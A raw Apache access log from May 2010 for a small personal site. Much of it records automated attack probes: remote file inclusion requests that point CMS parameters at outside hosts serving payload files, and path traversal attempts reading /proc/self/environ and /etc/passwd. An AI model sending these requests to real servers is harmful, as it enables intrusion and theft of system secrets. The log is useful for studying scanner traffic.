89.108.66.144 - - [23/May/2010:19:00:33 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
72.161.92.51 - - [23/May/2010:19:00:57 -0500] "GET /logs//bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.161.92.51 - - [23/May/2010:19:00:58 -0500] "GET //bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.161.92.51 - - [23/May/2010:19:00:58 -0500] "GET /logs/access_log.1272585600//bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
119.235.18.101 - - [23/May/2010:19:03:43 -0500] "GET //DNS/RR.php?phpdns_basedir=http://www.valentinshop.net/bbs/img/id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
119.235.18.101 - - [23/May/2010:19:03:55 -0500] "GET /logs/access_log.1208822400//DNS/RR.php?phpdns_basedir=http://www.valentinshop.net/bbs/img/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
119.235.18.101 - - [23/May/2010:19:03:55 -0500] "GET /logs//DNS/RR.php?phpdns_basedir=http://www.valentinshop.net/bbs/img/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
119.235.18.101 - - [23/May/2010:19:04:00 -0500] "GET /logs//DNS/RR.php?phpdns_basedir=http://www.valentinshop.net/bbs/img/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
119.235.18.101 - - [23/May/2010:19:04:00 -0500] "GET //DNS/RR.php?phpdns_basedir=http://www.valentinshop.net/bbs/img/id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
119.235.18.101 - - [23/May/2010:19:04:00 -0500] "GET /logs/access_log.1208822400%20%20//DNS/RR.php?phpdns_basedir=http://www.valentinshop.net/bbs/img/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
119.235.18.101 - - [23/May/2010:19:04:14 -0500] "GET /logs/access_log.1208822400%20%20//DNS/RR.php?phpdns_basedir=http://www.valentinshop.net/bbs/img/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:19:04:35 -0500] "GET /logs/access_log.1183161600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
119.235.18.101 - - [23/May/2010:19:05:10 -0500] "GET /logs/access_log.1208822400//DNS/RR.php?phpdns_basedir=http://www.valentinshop.net/bbs/img/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:19:07:44 -0500] "GET /logs//?_PHPLIB[libdir]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 200 6786 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:19:07:45 -0500] "GET //?_PHPLIB[libdir]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:19:07:45 -0500] "GET /logs/access_log.1270857600//?_PHPLIB[libdir]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:19:07:49 -0500] "GET /logs/access_log.1272412800//?_PHPLIB[libdir]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:19:07:51 -0500] "GET /logs//?_PHPLIB[libdir]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 200 6786 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:19:07:51 -0500] "GET /logs/access_log.1272412800//?_PHPLIB[libdir]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:19:07:51 -0500] "GET /logs/access_log.1270857600//?_PHPLIB[libdir]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:19:07:56 -0500] "GET //?_PHPLIB[libdir]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:19:11:08 -0500] "GET /logs/access_log.1156636800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.192.168.241 - - [23/May/2010:19:11:41 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:11:41 -0500] "GET /logs/access_log.1270771200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:11:41 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:12:20 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:12:20 -0500] "GET /logs/access_log.1270771200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:12:20 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:12:57 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:12:57 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:12:57 -0500] "GET /logs/access_log.1270771200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.108.66.144 - - [23/May/2010:19:14:55 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.812"
89.108.66.144 - - [23/May/2010:19:14:56 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
89.108.66.144 - - [23/May/2010:19:14:56 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
87.250.255.243 - - [23/May/2010:19:15:27 -0500] "GET /logs/access_log.1248393600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.62.216.2 - - [23/May/2010:19:16:02 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.62.216.2 - - [23/May/2010:19:16:02 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.62.216.2 - - [23/May/2010:19:16:02 -0500] "GET /logs/access_log.1272153600//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.62.216.2 - - [23/May/2010:19:16:02 -0500] "GET /logs/access_log.1272326400//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
207.46.204.186 - - [23/May/2010:19:17:02 -0500] "GET /logs/access_log.1199145600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [23/May/2010:19:23:03 -0500] "GET /logs/access_log.1172361600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:19:29:47 -0500] "GET /logs/access_log.1225929600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.36.5.247 - - [23/May/2010:19:31:08 -0500] "GET /logs/access_log.1271894400//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.36.5.247 - - [23/May/2010:19:31:08 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.36.5.247 - - [23/May/2010:19:31:08 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.195.112.180 - - [23/May/2010:19:32:43 -0500] "GET /logs/access_log.1215475200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.177 - - [23/May/2010:19:33:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.111.173.43 - - [23/May/2010:19:34:03 -0500] "GET //global/templates/admin_page_open.php?g_root_dir=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
89.111.173.43 - - [23/May/2010:19:34:03 -0500] "GET /logs//global/templates/admin_page_open.php?g_root_dir=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
87.250.255.243 - - [23/May/2010:19:34:09 -0500] "GET /logs/access_log.1210636800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
68.198.92.71 - - [23/May/2010:19:35:24 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=en&start=20&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%26um%3D1%26hl%3Den%26client%3Dsafari%26sa%3DX%26rls%3Den%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
68.198.92.71 - - [23/May/2010:19:35:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
87.250.255.243 - - [23/May/2010:19:38:55 -0500] "GET /logs/access_log.1247097600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.142.211.175 - - [23/May/2010:19:43:52 -0500] "GET /logs/access_log.1264032000/?APB_rp=http://www.projectmoneygenerator.com/PayPal/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.142.211.175 - - [23/May/2010:19:43:52 -0500] "GET /?APB_rp=http://www.projectmoneygenerator.com/PayPal/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
91.142.211.175 - - [23/May/2010:19:43:52 -0500] "GET /logs/?APB_rp=http://www.projectmoneygenerator.com/PayPal/id1.txt?? HTTP/1.1" 200 6781 "-""Mozilla/5.0"
207.46.195.233 - - [23/May/2010:19:44:32 -0500] "GET /logs/access_log.1225929600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.233 - - [23/May/2010:19:44:32 -0500] "GET /logs/access_log.1260835200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [23/May/2010:19:44:42 -0500] "GET /logs/access_log.1184803200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.78.123 - - [23/May/2010:19:44:49 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.806"
89.108.66.144 - - [23/May/2010:19:45:45 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
114.108.177.125 - - [23/May/2010:19:47:19 -0500] "GET /logs///engine/api/api.class.php?dle_config_api=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:19:47:19 -0500] "GET ///engine/api/api.class.php?dle_config_api=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:19:47:23 -0500] "GET /logs/access_log.1270598400///engine/api/api.class.php?dle_config_api=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:19:47:26 -0500] "GET /logs/access_log.1272585600///engine/api/api.class.php?dle_config_api=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:19:49:35 -0500] "GET /logs/access_log.1258416000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.192.168.241 - - [23/May/2010:19:52:26 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:52:26 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:52:26 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:53:02 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:53:02 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:53:02 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:53:13 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:53:13 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:19:53:13 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
173.45.109.10 - - [23/May/2010:19:53:27 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
173.45.109.10 - - [23/May/2010:19:53:27 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.250.255.243 - - [23/May/2010:19:55:22 -0500] "GET /logs/access_log.1166400000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.78.123 - - [23/May/2010:19:57:14 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:19:57:14 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:19:57:15 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:19:58:55 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.806"
66.249.65.51 - - [23/May/2010:19:59:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.51 - - [23/May/2010:19:59:35 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [23/May/2010:20:01:13 -0500] "GET /logs/access_log.1177286400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.50 - - [23/May/2010:20:03:32 -0500] "GET /logs/access_log.1252368000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [23/May/2010:20:07:05 -0500] "GET /logs/access_log.1159401600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:20:10:05 -0500] "GET /logs/access_log.1203984000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:20:13:39 -0500] "GET /logs/access_log.1192147200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.24.74.228 - - [23/May/2010:20:13:40 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
114.24.74.228 - - [23/May/2010:20:13:47 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
87.250.255.243 - - [23/May/2010:20:18:26 -0500] "GET /logs/access_log.1199664000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [23/May/2010:20:19:53 -0500] "GET /logs/access_log.1212019200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.193.56 - - [23/May/2010:20:21:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
121.88.4.141 - - [23/May/2010:20:22:32 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.54.52.210 - - [23/May/2010:20:23:00 -0500] "GET /logs/access_log.1271894400/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
74.54.52.210 - - [23/May/2010:20:23:00 -0500] "GET /index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.54.52.210 - - [23/May/2010:20:23:01 -0500] "GET /logs/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
196.35.158.182 - - [23/May/2010:20:23:05 -0500] "GET /logs/access_log.1271894400/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
196.35.158.182 - - [23/May/2010:20:23:06 -0500] "GET /index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
196.35.158.182 - - [23/May/2010:20:23:06 -0500] "GET /logs/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
69.168.54.22 - - [23/May/2010:20:23:18 -0500] "GET /logs/access_log.1271894400/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.168.54.22 - - [23/May/2010:20:23:18 -0500] "GET /index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.168.54.22 - - [23/May/2010:20:23:18 -0500] "GET /logs/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.167.211 - - [23/May/2010:20:23:34 -0500] "GET /logs/access_log.1271894400/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.106.167.211 - - [23/May/2010:20:23:34 -0500] "GET /index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.167.211 - - [23/May/2010:20:23:34 -0500] "GET /logs/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [23/May/2010:20:24:22 -0500] "GET /artwork/llpostcards.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.242 - - [23/May/2010:20:25:02 -0500] "GET /logs/access_log.1228262400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.195 - - [23/May/2010:20:25:33 -0500] "GET /logs/access_log.1236124800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [23/May/2010:20:27:01 -0500] "GET /logs/access_log.1169337600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
122.249.22.58 - - [23/May/2010:20:27:13 -0500] "GET /logs/access_log.1271894400/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
122.249.22.58 - - [23/May/2010:20:27:14 -0500] "GET /index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
122.249.22.58 - - [23/May/2010:20:27:15 -0500] "GET /logs/index2.php?DoAction=%20index2.php?DoAction=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
174.133.204.130 - - [23/May/2010:20:28:35 -0500] "GET /logs//modules/cjaycontent/admin/editor2/errors.php?error=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.133.204.130 - - [23/May/2010:20:28:35 -0500] "GET //modules/cjaycontent/admin/editor2/errors.php?error=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.133.204.130 - - [23/May/2010:20:28:35 -0500] "GET /logs/access_log.1270771200//modules/cjaycontent/admin/editor2/errors.php?error=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.208.34.38 - - [23/May/2010:20:29:07 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.208.34.38 - - [23/May/2010:20:29:07 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.208.34.38 - - [23/May/2010:20:29:07 -0500] "GET /logs/access_log.1272499200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:20:29:17 -0500] "GET /costume HTTP/1.1" 301 331 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:20:29:23 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.208.34.38 - - [23/May/2010:20:29:36 -0500] "GET /logs/access_log.1270944000//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:29:46 -0500] "GET /logs//joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:29:46 -0500] "GET //joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:29:46 -0500] "GET /logs/access_log.1266019200//joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:29:48 -0500] "GET //joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:29:48 -0500] "GET /logs/access_log.1266019200//joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:29:48 -0500] "GET /logs//joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:30:02 -0500] "GET //joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:30:02 -0500] "GET /logs//joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
91.192.168.241 - - [23/May/2010:20:30:02 -0500] "GET /logs/access_log.1266019200//joomla/components/com_virtuemart/virtuemart_parser.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
65.89.55.2 - - [23/May/2010:20:30:05 -0500] "GET /index2.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.46.204.242 - - [23/May/2010:20:30:32 -0500] "GET /logs/access_log.1175212800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.135.18 - - [23/May/2010:20:31:34 -0500] "GET /logs/access_log.1273017600/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:20:34:02 -0500] "GET /logs/access_log.1203465600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.230 - - [23/May/2010:20:34:32 -0500] "GET /logs/access_log.1266969600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [23/May/2010:20:35:28 -0500] "GET /logs/access_log.1171756800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
